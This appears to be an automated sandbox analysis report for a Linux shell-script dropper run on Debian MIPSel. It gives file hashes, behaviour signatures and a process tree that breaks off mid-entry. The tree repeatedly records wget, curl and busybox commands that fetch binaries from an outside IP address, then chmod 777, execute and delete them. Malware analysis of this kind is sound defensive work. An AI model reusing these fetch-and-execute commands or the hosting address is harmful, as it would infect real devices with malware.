c3f5f100216f6fa621a94dafd837a25b33e54c6d582437f199573b0666233951

Analysis

max time kernel
95s
max time network
98s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
20/11/2024, 03:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c3f5f100216f6fa621a94dafd837a25b33e54c6d582437f199573b0666233951.sh
Size

10KB
MD5

b982e5c1ac74667db9af33b2b6d6973e
SHA1

afa479274c2c4dd4adf3e1e4d1785a718f9726c1
SHA256

c3f5f100216f6fa621a94dafd837a25b33e54c6d582437f199573b0666233951
SHA512

3456abe11ad2ddd1fa2b356a338c5fc5188463c51273368668949566a309a2e02cc102ab3fd7a96dfede837ec95cb5ff426c784dfcf02ba8eaabafe74a195870
SSDEEP

192:hSq8txwjmKVNlAsKYyObRZxSq8txQ9VNlAsjH:hSq8txwjmdrSRDSq8txQ7

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
897	chmod
903	chmod
909	chmod
927	chmod
867	chmod
921	chmod
809	chmod
825	chmod
933	chmod
975	chmod
848	chmod
957	chmod
981	chmod
747	chmod
755	chmod
785	chmod
891	chmod
939	chmod
963	chmod
885	chmod
945	chmod
951	chmod
969	chmod
740	chmod
816	chmod
873	chmod
879	chmod
915	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp	curl
File opened for modification	/tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z	curl
File opened for modification	/tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z	curl
File opened for modification	/tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7	curl
File opened for modification	/tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj	curl
File opened for modification	/tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV	curl
File opened for modification	/tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ	curl
File opened for modification	/tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO	curl
File opened for modification	/tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj	curl
File opened for modification	/tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu	curl
File opened for modification	/tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1	curl
File opened for modification	/tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7	curl
File opened for modification	/tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z	curl
File opened for modification	/tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV	curl
File opened for modification	/tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp	curl
File opened for modification	/tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat	curl
File opened for modification	/tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN	curl
File opened for modification	/tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ	curl
File opened for modification	/tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN	curl
File opened for modification	/tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z	curl
File opened for modification	/tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r	curl
File opened for modification	/tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1	curl
File opened for modification	/tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO	curl
File opened for modification	/tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r	curl
File opened for modification	/tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf	curl
File opened for modification	/tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf	curl
File opened for modification	/tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat	curl
File opened for modification	/tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu	curl

/tmp/c3f5f100216f6fa621a94dafd837a25b33e54c6d582437f199573b0666233951.sh
/tmp/c3f5f100216f6fa621a94dafd837a25b33e54c6d582437f199573b0666233951.sh
1⤵
PID:709
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:712
- /usr/bin/wget
  wget http://216.126.231.240/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  PID:717
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:731
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  PID:738
- /bin/chmod
  chmod 777 lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - File and Directory Permissions Modification
  PID:740
- /tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  ./lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - Executes dropped EXE
  PID:741
- /bin/rm
  rm lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  PID:743
- /usr/bin/wget
  wget http://216.126.231.240/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  PID:744
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:745
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  PID:746
- /bin/chmod
  chmod 777 AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - File and Directory Permissions Modification
  PID:747
- /tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  ./AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - Executes dropped EXE
  PID:748
- /bin/rm
  rm AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  PID:749
- /usr/bin/wget
  wget http://216.126.231.240/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  PID:750
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:751
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  PID:752
- /bin/chmod
  chmod 777 KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - File and Directory Permissions Modification
  PID:755
- /tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  ./KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - Executes dropped EXE
  PID:756
- /bin/rm
  rm KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  PID:759
- /usr/bin/wget
  wget http://216.126.231.240/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  PID:760
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:768
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  PID:778
- /bin/chmod
  chmod 777 MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - File and Directory Permissions Modification
  PID:785
- /tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  ./MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - Executes dropped EXE
  PID:786
- /bin/rm
  rm MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  PID:789
- /usr/bin/wget
  wget http://216.126.231.240/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  PID:790
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:798
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  PID:805
- /bin/chmod
  chmod 777 DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - File and Directory Permissions Modification
  PID:809
- /tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  ./DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - Executes dropped EXE
  PID:810
- /bin/rm
  rm DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  PID:812
- /usr/bin/wget
  wget http://216.126.231.240/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  PID:813
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:814
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  PID:815
- /bin/chmod
  chmod 777 gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - File and Directory Permissions Modification
  PID:816
- /tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  ./gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - Executes dropped EXE
  PID:817
- /bin/rm
  rm gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  PID:818
- /usr/bin/wget
  wget http://216.126.231.240/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  PID:819
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:823
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  PID:824
- /bin/chmod
  chmod 777 Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - File and Directory Permissions Modification
  PID:825
- /tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  ./Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - Executes dropped EXE
  PID:826
- /bin/rm
  rm Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  PID:827
- /usr/bin/wget
  wget http://216.126.231.240/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  PID:828
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:834
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  PID:842
- /bin/chmod
  chmod 777 lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - File and Directory Permissions Modification
  PID:848
- /tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  ./lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - Executes dropped EXE
  PID:849
- /bin/rm
  rm lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  PID:852
- /usr/bin/wget
  wget http://216.126.231.240/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  PID:854
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:865
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  PID:866
- /bin/chmod
  chmod 777 iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - File and Directory Permissions Modification
  PID:867
- /tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  ./iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - Executes dropped EXE
  PID:868
- /bin/rm
  rm iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  PID:869
- /usr/bin/wget
  wget http://216.126.231.240/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  PID:870
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:871
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  PID:872
- /bin/chmod
  chmod 777 iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  - File and Directory Permissions Modification
  PID:873
- /tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  ./iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  - Executes dropped EXE
  PID:874
- /bin/rm
  rm iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  PID:875
- /usr/bin/wget
  wget http://216.126.231.240/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  PID:876
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:877
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  PID:878
- /bin/chmod
  chmod 777 oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - File and Directory Permissions Modification
  PID:879
- /tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  ./oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - Executes dropped EXE
  PID:880
- /bin/rm
  rm oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  PID:881
- /usr/bin/wget
  wget http://216.126.231.240/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  PID:882
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:883
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  PID:884
- /bin/chmod
  chmod 777 gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - File and Directory Permissions Modification
  PID:885
- /tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  ./gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - Executes dropped EXE
  PID:886
- /bin/rm
  rm gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  PID:887
- /usr/bin/wget
  wget http://216.126.231.240/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  PID:888
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:889
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  PID:890
- /bin/chmod
  chmod 777 h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - File and Directory Permissions Modification
  PID:891
- /tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  ./h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - Executes dropped EXE
  PID:892
- /bin/rm
  rm h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  PID:893
- /usr/bin/wget
  wget http://216.126.231.240/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  PID:894
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:895
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  PID:896
- /bin/chmod
  chmod 777 gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - File and Directory Permissions Modification
  PID:897
- /tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  ./gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - Executes dropped EXE
  PID:898
- /bin/rm
  rm gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  PID:899
- /usr/bin/wget
  wget http://216.126.231.240/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  PID:900
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:901
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  PID:902
- /bin/chmod
  chmod 777 oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - File and Directory Permissions Modification
  PID:903
- /tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  ./oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  - Executes dropped EXE
  PID:904
- /bin/rm
  rm oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
  2⤵
  PID:905
- /usr/bin/wget
  wget http://216.126.231.240/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  PID:906
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:907
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  PID:908
- /bin/chmod
  chmod 777 gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  ./gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  - Executes dropped EXE
  PID:910
- /bin/rm
  rm gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
  2⤵
  PID:911
- /usr/bin/wget
  wget http://216.126.231.240/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  PID:912
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:913
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  PID:914
- /bin/chmod
  chmod 777 h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - File and Directory Permissions Modification
  PID:915
- /tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  ./h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  - Executes dropped EXE
  PID:916
- /bin/rm
  rm h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
  2⤵
  PID:917
- /usr/bin/wget
  wget http://216.126.231.240/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  PID:918
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:919
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  PID:920
- /bin/chmod
  chmod 777 gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - File and Directory Permissions Modification
  PID:921
- /tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  ./gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  - Executes dropped EXE
  PID:922
- /bin/rm
  rm gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
  2⤵
  PID:923
- /usr/bin/wget
  wget http://216.126.231.240/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  PID:924
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:925
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  PID:926
- /bin/chmod
  chmod 777 lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - File and Directory Permissions Modification
  PID:927
- /tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  ./lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  - Executes dropped EXE
  PID:928
- /bin/rm
  rm lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
  2⤵
  PID:929
- /usr/bin/wget
  wget http://216.126.231.240/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  PID:930
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:931
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  PID:932
- /bin/chmod
  chmod 777 AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - File and Directory Permissions Modification
  PID:933
- /tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  ./AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  - Executes dropped EXE
  PID:934
- /bin/rm
  rm AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
  2⤵
  PID:935
- /usr/bin/wget
  wget http://216.126.231.240/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  PID:936
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:937
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  PID:938
- /bin/chmod
  chmod 777 KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - File and Directory Permissions Modification
  PID:939
- /tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  ./KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  - Executes dropped EXE
  PID:940
- /bin/rm
  rm KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
  2⤵
  PID:941
- /usr/bin/wget
  wget http://216.126.231.240/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  PID:942
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:943
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  PID:944
- /bin/chmod
  chmod 777 MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - File and Directory Permissions Modification
  PID:945
- /tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  ./MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - Executes dropped EXE
  PID:946
- /bin/rm
  rm MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  PID:947
- /usr/bin/wget
  wget http://216.126.231.240/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  PID:948
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:949
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  PID:950
- /bin/chmod
  chmod 777 DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - File and Directory Permissions Modification
  PID:951
- /tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  ./DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - Executes dropped EXE
  PID:952
- /bin/rm
  rm DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  PID:953
- /usr/bin/wget
  wget http://216.126.231.240/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  PID:954
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:955
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  PID:956
- /bin/chmod
  chmod 777 gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - File and Directory Permissions Modification
  PID:957
- /tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  ./gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - Executes dropped EXE
  PID:958
- /bin/rm
  rm gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  PID:959
- /usr/bin/wget
  wget http://216.126.231.240/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  PID:960
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:961
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  PID:962
- /bin/chmod
